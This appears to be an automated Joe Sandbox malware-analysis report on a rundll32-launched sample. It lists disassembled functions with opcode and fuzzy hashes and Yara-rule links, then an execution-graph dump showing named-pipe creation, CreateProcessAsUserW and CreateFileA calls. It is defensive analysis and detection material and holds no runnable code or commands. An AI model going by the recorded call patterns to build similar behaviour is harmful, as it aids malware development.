                                                                                                              • Source File: 00000005.00000002.2169149291.00000000033DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033DD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_33dd000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d03f6bf877f5262dd1584cdfd6d9b4d1f92e74edf8f49231efd1c90a8acae8d8
                                                                                                              • Instruction ID: 6cf94e1e16341f1ec7cd40fca81f1c3ece549e9eff25d6265fa08d111b03ce5b
                                                                                                              • Opcode Fuzzy Hash: d03f6bf877f5262dd1584cdfd6d9b4d1f92e74edf8f49231efd1c90a8acae8d8
                                                                                                              • Instruction Fuzzy Hash: 9501DF72404304AAE7208A25FDC4B66BF9CEF81324F0C855AED084A682C37C9846CAB1
                                                                                                              Function 07376A30 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b4331c23a40165b7ebeabb4aafbf6f9d24a53dcc0fee78a72d82117a34e106ce
                                                                                                              • Instruction ID: 717269bb9a5b5daa5080bd09c687b6b576185d326e949c599aad15b5cdc2581b
                                                                                                              • Opcode Fuzzy Hash: b4331c23a40165b7ebeabb4aafbf6f9d24a53dcc0fee78a72d82117a34e106ce
                                                                                                              • Instruction Fuzzy Hash: C80184B1700608D7FB68AB69C8657AF7AE69FC9210F24802DD009A7790CF794D05C7D2
                                                                                                              Function 07371440 Relevance: .0, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2cddd26a179d40ac2c8ac6c789ba0194f88ebeb15faba8030ec6fca8b5bca524
                                                                                                              • Instruction ID: 85099123a78231f0ee6850b6bfc782789eb3d128aa9d44437dfd0fab272f898d
                                                                                                              • Opcode Fuzzy Hash: 2cddd26a179d40ac2c8ac6c789ba0194f88ebeb15faba8030ec6fca8b5bca524
                                                                                                              • Instruction Fuzzy Hash: F5012B70A193898FE71A4F3458736963FB9ADC221070908DFC649CF152FA2C4509C3D2
                                                                                                              Function 033DD006 Relevance: .0, Instructions: 43COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2169149291.00000000033DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 033DD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_33dd000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 688d9d07e993862379d6b52fecb26b4350f6c8d25f4b91435e4609f6c25fe8e4
                                                                                                              • Instruction ID: 4ea1711eb65f9922658038a99cf481ea35ec8ee3fa64b37df47db6c843e4d779
                                                                                                              • Opcode Fuzzy Hash: 688d9d07e993862379d6b52fecb26b4350f6c8d25f4b91435e4609f6c25fe8e4
                                                                                                              • Instruction Fuzzy Hash: FF01527240E3C05EE7128B259C94B52BFA4DF53224F1D85DBD9888F193C2699845C772
                                                                                                              Function 07377FDA Relevance: .0, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2ad5d86c551da3b4f71a06dc2a926cc7fac9885ec7561ff3fa692df56f062685
                                                                                                              • Instruction ID: 9f6a4a9db01f34d109eb119196d0ce8f5d02c696c796371eaa0ce46e4b0c7ed2
                                                                                                              • Opcode Fuzzy Hash: 2ad5d86c551da3b4f71a06dc2a926cc7fac9885ec7561ff3fa692df56f062685
                                                                                                              • Instruction Fuzzy Hash: 51F0B47930030157E322E61EF8859DFBBDAEBC5660345812AE54D87600DF6AA80187D6
                                                                                                              Function 07371431 Relevance: .0, Instructions: 37COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 353c43752af36f5ad98771602500dccdff0cf2725da9e89d584b22786fc3d70a
                                                                                                              • Instruction ID: d01d8155e7eb77a5eca15c22b56f2e75f7ef47f648c741fedb8f193f76f156eb
                                                                                                              • Opcode Fuzzy Hash: 353c43752af36f5ad98771602500dccdff0cf2725da9e89d584b22786fc3d70a
                                                                                                              • Instruction Fuzzy Hash: F6F0FC7160434A9FE7195F75587366A3FADBDC632070948AEC649CF142FE298505C7C1
                                                                                                              Function 07377FE0 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 76a348fbdae6c72b6181a598e5c69e082a65734570d178711bc16287eea2c15c
                                                                                                              • Instruction ID: 77f15ab649bb252fb8851a315b10c41f1c2e02daa1d2d2f3077699c1fad76d8a
                                                                                                              • Opcode Fuzzy Hash: 76a348fbdae6c72b6181a598e5c69e082a65734570d178711bc16287eea2c15c
                                                                                                              • Instruction Fuzzy Hash: 74F0E2B530030157E322E61EE88588FBBDAEBC5660345802AE50D87300DF6AAC0187D6
                                                                                                              Function 07375278 Relevance: .0, Instructions: 33COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8462cd6949d8a05be1f6e2f0fa4172b98d636672154b24e7770bcecbc2d53e8d
                                                                                                              • Instruction ID: 1c3d78b4055748fb12a42098e93a2b92e16d15a26afc666d0159f143077588fa
                                                                                                              • Opcode Fuzzy Hash: 8462cd6949d8a05be1f6e2f0fa4172b98d636672154b24e7770bcecbc2d53e8d
                                                                                                              • Instruction Fuzzy Hash: 9BF05C3A7093445FC3055629E8405D7BB65DFC6228F6500BAE148C7252CC3A9C06C7A0
                                                                                                              Function 07372EFA Relevance: .0, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a66c646b32f2b02611c26d22424a49c48cedbdad64cc52c6966f90a603241060
                                                                                                              • Instruction ID: 097bb6931d4c19d07c93de1a09d8c959af92002a21a192e3233d2686d3001428
                                                                                                              • Opcode Fuzzy Hash: a66c646b32f2b02611c26d22424a49c48cedbdad64cc52c6966f90a603241060
                                                                                                              • Instruction Fuzzy Hash: 40E065E0A1A7992AFB36117488103672DED5B42614F0400A7E48DC6793D5DDC846D3E3
                                                                                                              Function 07377870 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b8dd51544e35e838327b5a3875ea403d3b15b0eaefff9c45d6c5e49f73501d56
                                                                                                              • Instruction ID: c415a80606581524f14774f79251227abffe514680ae01759b57e46038c5cebc
                                                                                                              • Opcode Fuzzy Hash: b8dd51544e35e838327b5a3875ea403d3b15b0eaefff9c45d6c5e49f73501d56
                                                                                                              • Instruction Fuzzy Hash: EFF0827220C7914FD369DB3C9452566BBE5AF95300B05887FD0C9C32C2E635A840C725
                                                                                                              Function 07377F67 Relevance: .0, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 636e79778eb2cf1f40ec1880d53ceb0ddaaec01bc4291c1ccc390210c3e6fe4b
                                                                                                              • Instruction ID: 93447447076e73ca3daca559adf2665561bbeefeafbc33331881e3a77bf17522
                                                                                                              • Opcode Fuzzy Hash: 636e79778eb2cf1f40ec1880d53ceb0ddaaec01bc4291c1ccc390210c3e6fe4b
                                                                                                              • Instruction Fuzzy Hash: A1E0223590A349AFC702EB68F84208DBBF8EA42214B11829AE049D3212EF315F0097C2
                                                                                                              Function 07375288 Relevance: .0, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 65b89097e045a40a6b0694370e886b7ace8e89094354ea30cf4abb7ca893b60b
                                                                                                              • Instruction ID: ed5e37ecea1c233d34f27cc79ef7c01d3d05b211d774ecafb4ab2c2d76cfa953
                                                                                                              • Opcode Fuzzy Hash: 65b89097e045a40a6b0694370e886b7ace8e89094354ea30cf4abb7ca893b60b
                                                                                                              • Instruction Fuzzy Hash: B2E026367003044BC304AA2AE840967F7AADBC9228B604079E10CC7315CD369C028690
                                                                                                              Function 07372F80 Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e3ae027bc9fc090e013ca0295968642619423e2b5a123db138f93ee35b0e4f41
                                                                                                              • Instruction ID: 77f771c8fea451011586e294ee311d2f711535b5ce933e3cc3f2c67b5ecbf9ab
                                                                                                              • Opcode Fuzzy Hash: e3ae027bc9fc090e013ca0295968642619423e2b5a123db138f93ee35b0e4f41
                                                                                                              • Instruction Fuzzy Hash: 42D0C736A1A3A05BEF2622B420102E7BFAC9B06020F0504D3F90CCA203D92C984083D1
                                                                                                              Function 07372958 Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cc7fd9ab5dbf9fdb61dca5d34c5ed4b5988eb0c9c767e54f7f57fadc3b15db58
                                                                                                              • Instruction ID: c340af46d8f6dfbe0418a8d3cbf517419831498ad4e1b66ad216e0e2b464f348
                                                                                                              • Opcode Fuzzy Hash: cc7fd9ab5dbf9fdb61dca5d34c5ed4b5988eb0c9c767e54f7f57fadc3b15db58
                                                                                                              • Instruction Fuzzy Hash: 2FE0D8B5D09208EFDB01DB74EA8359C7FB4DB01200B1040E9E808DB141E9381F00CB92
                                                                                                              Function 073717F0 Relevance: .0, Instructions: 21COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 77bd63054e8ddd68b018f548877395cb0a592da02b60faa8f0801600c8a4ca66
                                                                                                              • Instruction ID: 0740cd8c4572eb2012ce7d891e0ae1b8eba88ce1826e1cb79bb07e5ea85fc1c2
                                                                                                              • Opcode Fuzzy Hash: 77bd63054e8ddd68b018f548877395cb0a592da02b60faa8f0801600c8a4ca66
                                                                                                              • Instruction Fuzzy Hash: 7DE02B3320D3945FC3075B60E8114E6BFB99B4B12030940ABF8808B362DD250D11D7D5
                                                                                                              Function 07370C0C Relevance: .0, Instructions: 17COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a30996be9760c19699aa85b3dd89db3c856dd9782829ed389265b5d4321270cd
                                                                                                              • Instruction ID: 4f0f6c6f063e859b0c8ef536b224988c2a3bd70beda9a7fe4165c1ffc8e01226
                                                                                                              • Opcode Fuzzy Hash: a30996be9760c19699aa85b3dd89db3c856dd9782829ed389265b5d4321270cd
                                                                                                              • Instruction Fuzzy Hash: D6D0A7B226011CAB52246718D85596A7B99E7C5361750442BF90983610CD645C11D7DA
                                                                                                              Function 07372968 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 80bf795ddf48e9d5b9052c4b5fde4a8712d36f628d9e2d27a6e68d5199accbe7
                                                                                                              • Instruction ID: 7008cc8911cf00545ca9381efb5ce9a8eddc7292d8f5c5e9a0421d2dabcd6b4a
                                                                                                              • Opcode Fuzzy Hash: 80bf795ddf48e9d5b9052c4b5fde4a8712d36f628d9e2d27a6e68d5199accbe7
                                                                                                              • Instruction Fuzzy Hash: 79D05B7490120DEFDB04DFB4EA4295DBBB9DB44300B104599E40DD7241DA755F009F91
                                                                                                              Function 07377F78 Relevance: .0, Instructions: 16COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a4fe4cd9b30133ce38f256d26384b5242ae4719a32bfad136f0563c69be69a91
                                                                                                              • Instruction ID: e38453c5e4ef2cb48f71f47e3d1653eca0b8eb2545fcd765018a78a153420c11
                                                                                                              • Opcode Fuzzy Hash: a4fe4cd9b30133ce38f256d26384b5242ae4719a32bfad136f0563c69be69a91
                                                                                                              • Instruction Fuzzy Hash: 2BD05E74A0220DEFCB10EFBCE94259DBBF9EB45210B1141A9E80DD7200EF316F00AB82
                                                                                                              Function 07370440 Relevance: .0, Instructions: 12COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000003.2168289795.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_3_7370000_rundll32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fe8f4bdef5161d5deae8b5f7b8e28342d3c4f9f16c170e2ec2f6f07a8ac0a79d
                                                                                                              • Instruction ID: 03685bde814f10af1fbf3cdaf1c3c0e57f9aa963b145577d59330bb3b992d6f0
                                                                                                              • Opcode Fuzzy Hash: fe8f4bdef5161d5deae8b5f7b8e28342d3c4f9f16c170e2ec2f6f07a8ac0a79d
                                                                                                              • Instruction Fuzzy Hash: 99C0123604D3915FC7134760A8824D1BF31AA2231174516DBE0C1C5493C2290999C7F1

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:13.8%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:6.7%
                                                                                                              Total number of Nodes:434
                                                                                                              Total number of Limit Nodes:32
                                                                                                              execution_graph 50358 4f829f8 50359 4f82a0a 50358->50359 50360 4f82a4e 50359->50360 50362 4f82e60 50359->50362 50363 4f82e6f 50362->50363 50364 4f832e0 50363->50364 50367 bf7481 50363->50367 50371 bf7490 50363->50371 50368 bf74ba 50367->50368 50369 bf74d5 50368->50369 50375 bff930 50368->50375 50369->50363 50372 bf74ba 50371->50372 50373 bf74d5 50372->50373 50374 bff930 2 API calls 50372->50374 50373->50363 50374->50373 50376 bff953 50375->50376 50378 bff963 50375->50378 50377 bff95c 50376->50377 50379 3704870 2 API calls 50376->50379 50380 37048f0 2 API calls 50376->50380 50381 37048e3 2 API calls 50376->50381 50377->50369 50378->50376 50388 bff930 2 API calls 50378->50388 50389 37048e3 50378->50389 50395 37048f0 50378->50395 50401 3704870 50378->50401 50408 bffab8 50378->50408 50415 bfa4c8 50378->50415 50421 bfa4b8 50378->50421 50379->50376 50380->50376 50381->50376 50388->50376 50391 37048ee 50389->50391 50390 370491d 50390->50376 50392 3704914 50391->50392 50394 bff930 2 API calls 50391->50394 50392->50390 50427 3706730 50392->50427 50394->50392 50398 37048f3 50395->50398 50396 370491d 50396->50376 50397 3704914 50397->50396 50399 3706730 2 API calls 50397->50399 50398->50397 50400 bff930 2 API calls 50398->50400 50399->50396 50400->50397 50403 3704873 50401->50403 50404 37048ee 50401->50404 50402 370491d 50402->50376 50403->50376 50405 3704914 50404->50405 50407 bff930 2 API calls 50404->50407 50405->50402 50406 3706730 2 API calls 50405->50406 50406->50402 50407->50405 50409 bffadb 50408->50409 50410 bffaeb 50408->50410 50412 bffae4 50409->50412 50468 3700040 50409->50468 50410->50409 50413 bffab8 2 API calls 50410->50413 50414 bff930 2 API calls 50410->50414 50412->50376 50413->50409 50414->50409 50416 bfa4f9 50415->50416 50417 bfa4ed 50415->50417 50416->50417 50418 3704870 2 API calls 50416->50418 50419 37048f0 2 API calls 50416->50419 50420 37048e3 2 API calls 50416->50420 50417->50376 50418->50417 50419->50417 50420->50417 50422 bfa4c8 50421->50422 50423 bfa4ed 50422->50423 50424 3704870 2 API calls 50422->50424 50425 37048f0 2 API calls 50422->50425 50426 37048e3 2 API calls 50422->50426 50423->50376 50424->50423 50425->50423 50426->50423 50428 370673c 50427->50428 50431 3700510 50428->50431 50430 370678b 50430->50390 50432 3700536 50431->50432 50435 48dfe49 50431->50435 50439 48dfe58 50431->50439 50432->50430 50436 48dfe54 50435->50436 50443 48dfe94 50436->50443 50437 48dfe8d 50437->50432 50440 48dfe6a 50439->50440 50442 48dfe94 2 API calls 50440->50442 50441 48dfe8d 50441->50432 50442->50441 50444 48dfe9c 50443->50444 50448 4f80288 50444->50448 50454 4f80279 50444->50454 50445 48dff00 50445->50437 50449 4f802af 50448->50449 50451 4f8039a 50449->50451 50460 4f80cc8 50449->50460 50464 4f80cc0 50449->50464 50450 4f80390 50450->50445 50451->50445 50455 4f80284 50454->50455 50457 4f8039a 50455->50457 50458 4f80cc8 CreateNamedPipeW 50455->50458 50459 4f80cc0 CreateNamedPipeW 50455->50459 50456 4f80390 50456->50445 50457->50445 50458->50456 50459->50456 50461 4f80d0c CreateNamedPipeW 50460->50461 50463 4f80d79 50461->50463 50463->50450 50465 4f80cc4 CreateNamedPipeW 50464->50465 50467 4f80d79 50465->50467 50467->50450 50469 370005f 50468->50469 50471 3700510 2 API calls 50469->50471 50473 3700502 50469->50473 50470 37000d1 50470->50412 50471->50470 50474 3700536 50473->50474 50475 48dfe49 2 API calls 50473->50475 50476 48dfe58 2 API calls 50473->50476 50474->50470 50475->50474 50476->50474 50890 4f844d8 50891 4f8451a 50890->50891 50892 4f84520 WaitNamedPipeW 50890->50892 50891->50892 50893 4f84554 50892->50893 50477 4f818f0 50478 4f81943 CreateProcessAsUserW 50477->50478 50480 4f819d4 50478->50480 50532 3705f68 50534 3705f6b 50532->50534 50533 3705f8c 50535 3705f95 50533->50535 50538 3706520 2 API calls 50533->50538 50539 3706598 2 API calls 50533->50539 50534->50533 50540 3706520 50534->50540 50546 3706598 50534->50546 50538->50533 50539->50533 50542 370653d 50540->50542 50541 37065c4 50541->50533 50543 37065bb 50542->50543 50545 bff930 2 API calls 50542->50545 50543->50541 50544 bff930 2 API calls 50543->50544 50544->50543 50545->50543 50547 370659b 50546->50547 50549 37065bb 50547->50549 50550 bff930 2 API calls 50547->50550 50548 37065c4 50548->50533 50549->50548 50551 bff930 2 API calls 50549->50551 50550->50549 50551->50549 50552 48d3855 50554 48d37c5 50552->50554 50553 48d3825 50554->50553 50567 48dfa1c 50554->50567 50571 48daca3 50554->50571 50577 48d7283 50554->50577 50582 48df540 50554->50582 50586 48dace0 50554->50586 50591 48d7208 50554->50591 50596 48dacd0 50554->50596 50601 48df530 50554->50601 50605 48df716 50554->50605 50609 48d7218 50554->50609 50614 48df799 50554->50614 50618 48dacdf 50554->50618 50568 48df5b0 50567->50568 50569 48df63d 50568->50569 50570 3706730 2 API calls 50568->50570 50570->50569 50572 48dacaf 50571->50572 50573 48dad0b 50571->50573 50572->50553 50574 48dad69 50573->50574 50623 5459520 50573->50623 50629 5459510 50573->50629 50574->50553 50578 48d7213 50577->50578 50579 48d7273 50578->50579 50671 48d748f 50578->50671 50674 48d7490 50578->50674 50579->50553 50584 48df572 50582->50584 50583 48df63d 50584->50583 50585 3706730 2 API calls 50584->50585 50585->50583 50588 48dad09 50586->50588 50587 48dad69 50587->50553 50588->50587 50589 5459510 5 API calls 50588->50589 50590 5459520 5 API calls 50588->50590 50589->50588 50590->50588 50592 48d7218 50591->50592 50593 48d7273 50592->50593 50594 48d748f 5 API calls 50592->50594 50595 48d7490 5 API calls 50592->50595 50593->50553 50594->50592 50595->50592 50598 48dad0b 50596->50598 50597 48dad69 50597->50553 50598->50597 50599 5459510 5 API calls 50598->50599 50600 5459520 5 API calls 50598->50600 50599->50598 50600->50598 50602 48df572 50601->50602 50603 48df63d 50602->50603 50604 3706730 2 API calls 50602->50604 50603->50603 50604->50603 50606 48df5b0 50605->50606 50607 48df63d 50606->50607 50608 3706730 2 API calls 50606->50608 50608->50607 50610 48d721b 50609->50610 50611 48d7273 50610->50611 50612 48d748f 5 API calls 50610->50612 50613 48d7490 5 API calls 50610->50613 50611->50553 50612->50610 50613->50610 50615 48df5b0 50614->50615 50616 48df63d 50615->50616 50617 3706730 2 API calls 50615->50617 50617->50616 50620 48dad09 50618->50620 50619 48dad69 50619->50553 50620->50619 50621 5459510 5 API calls 50620->50621 50622 5459520 5 API calls 50620->50622 50621->50620 50622->50620 50624 5459531 50623->50624 50625 545955a 50624->50625 50635 54587ec 50624->50635 50639 54587df 50624->50639 50643 54586fc 50624->50643 50625->50573 50630 545950a 50629->50630 50630->50629 50631 545955a 50630->50631 50632 54587ec 5 API calls 50630->50632 50633 54586fc 5 API calls 50630->50633 50634 54587df 5 API calls 50630->50634 50631->50573 50632->50631 50633->50631 50634->50631 50636 54587f7 50635->50636 50637 5459627 50636->50637 50647 48da64e 50636->50647 50637->50625 50640 545879b 50639->50640 50641 5459627 50640->50641 50642 48da64e 5 API calls 50640->50642 50641->50625 50642->50641 50644 5458705 50643->50644 50645 54586db 50644->50645 50646 48da64e 5 API calls 50644->50646 50645->50625 50646->50645 50648 48da658 50647->50648 50658 48db0c0 50648->50658 50660 48db0eb 50658->50660 50659 48db161 50660->50659 50663 5459640 50660->50663 50667 5459630 50660->50667 50664 5459652 50663->50664 50665 5459687 50664->50665 50666 54587ec 5 API calls 50664->50666 50665->50660 50666->50665 50668 545962a 50667->50668 50668->50667 50669 5459687 50668->50669 50670 54587ec 5 API calls 50668->50670 50669->50660 50670->50669 50672 48d749b 50671->50672 50677 48d7cb8 50671->50677 50672->50578 50675 48d749b 50674->50675 50676 48d7cb8 5 API calls 50674->50676 50675->50578 50676->50675 50679 48d7cf5 50677->50679 50678 48d84a6 50680 48d7cf9 50678->50680 50683 48da64e 5 API calls 50678->50683 50684 48da8b2 5 API calls 50678->50684 50679->50678 50679->50680 50681 48da64e 5 API calls 50679->50681 50685 48da8b2 50679->50685 50680->50672 50681->50678 50683->50680 50684->50680 50687 48da721 50685->50687 50686 48da8e1 50686->50678 50687->50686 50694 48de62c 50687->50694 50700 48deeb6 50687->50700 50706 48de827 50687->50706 50712 48de58b 50687->50712 50720 48de598 50687->50720 50728 48deebf 50687->50728 50696 48de63c 50694->50696 50695 48defa6 50695->50695 50734 4f842a0 50696->50734 50740 4f84303 50696->50740 50746 4f84310 50696->50746 50701 48def19 50700->50701 50703 4f842a0 CreateFileA 50701->50703 50704 4f84310 CreateFileA 50701->50704 50705 4f84303 CreateFileA 50701->50705 50702 48defa6 50702->50702 50703->50702 50704->50702 50705->50702 50707 48de833 50706->50707 50709 4f842a0 CreateFileA 50707->50709 50710 4f84310 CreateFileA 50707->50710 50711 4f84303 CreateFileA 50707->50711 50708 48defa6 50708->50708 50709->50708 50710->50708 50711->50708 50713 48de597 50712->50713 50769 48df1b6 50713->50769 50714 48de61f 50717 4f842a0 CreateFileA 50714->50717 50718 4f84310 CreateFileA 50714->50718 50719 4f84303 CreateFileA 50714->50719 50715 48defa6 50715->50715 50717->50715 50718->50715 50719->50715 50721 48de5c9 50720->50721 50724 48df1b6 4 API calls 50721->50724 50722 48defa6 50722->50722 50723 48de61f 50725 4f842a0 CreateFileA 50723->50725 50726 4f84310 CreateFileA 50723->50726 50727 4f84303 CreateFileA 50723->50727 50724->50723 50725->50722 50726->50722 50727->50722 50729 48deeca 50728->50729 50731 4f842a0 CreateFileA 50729->50731 50732 4f84310 CreateFileA 50729->50732 50733 4f84303 CreateFileA 50729->50733 50730 48defa6 50730->50730 50731->50730 50732->50730 50733->50730 50735 4f842a4 50734->50735 50737 4f842af 50735->50737 50752 4f8445f 50735->50752 50737->50695 50739 4f8445f CreateFileA 50739->50737 50741 4f8430c 50740->50741 50743 4f84347 50741->50743 50745 4f8445f CreateFileA 50741->50745 50742 4f84370 50744 4f8445f CreateFileA 50742->50744 50743->50695 50744->50743 50745->50742 50747 4f8432e 50746->50747 50749 4f84347 50747->50749 50750 4f8445f CreateFileA 50747->50750 50748 4f84370 50751 4f8445f CreateFileA 50748->50751 50749->50695 50750->50748 50751->50749 50753 4f84464 50752->50753 50757 4f8f670 50753->50757 50761 4f8f660 50753->50761 50758 4f8f683 50757->50758 50765 4f8db48 50758->50765 50762 4f8f683 50761->50762 50763 4f8db48 CreateFileA 50762->50763 50764 4f84370 50763->50764 50764->50739 50767 4f8f6c0 CreateFileA 50765->50767 50768 4f8f7f5 50767->50768 50770 48df1dc 50769->50770 50771 